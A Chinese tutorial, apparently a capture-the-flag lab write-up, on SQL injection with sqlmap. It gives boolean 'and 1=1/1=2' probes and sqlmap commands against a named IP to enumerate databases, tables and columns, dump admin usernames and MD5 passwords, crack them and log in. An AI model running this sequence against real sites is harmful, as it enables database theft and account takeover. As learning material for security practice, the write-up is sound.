登录
首页 >  数据库 >  MySQL

sqlmap注入图文详解

来源:脚本之家

时间:2022-12-30 13:33:23 198浏览 收藏

本篇文章主要是结合我之前面试的各种经历和实战开发中遇到的问题解决经验整理的,希望这篇《sqlmap注入图文详解》对你有很大帮助!欢迎收藏,分享给更多的需要的朋友学习~

1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。

地址栏输入 and 1=1 发现页面正常显示。

在这里插入图片描述

再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞

在这里插入图片描述

2.现在拿出我们的kali工具,sqlmap进行注入测试。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

在这里插入图片描述

3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

在这里插入图片描述

4.接下来查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

在这里插入图片描述

5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。

在这里插入图片描述

在这里插入图片描述

6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里

在这里插入图片描述

7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。

在这里插入图片描述

8.END 登录成功,拿到flag,提交。Gameover !

总结

本篇文章就到这里了,希望能给你带来帮助,也希望您能够多多关注golang学习网的更多内容!

以上就是《sqlmap注入图文详解》的详细内容,更多关于mysql的资料请关注golang学习网公众号!

声明:本文转载于:脚本之家 如有侵犯,请联系study_golang@163.com删除
相关阅读
更多>
最新阅读
更多>
课程推荐
更多>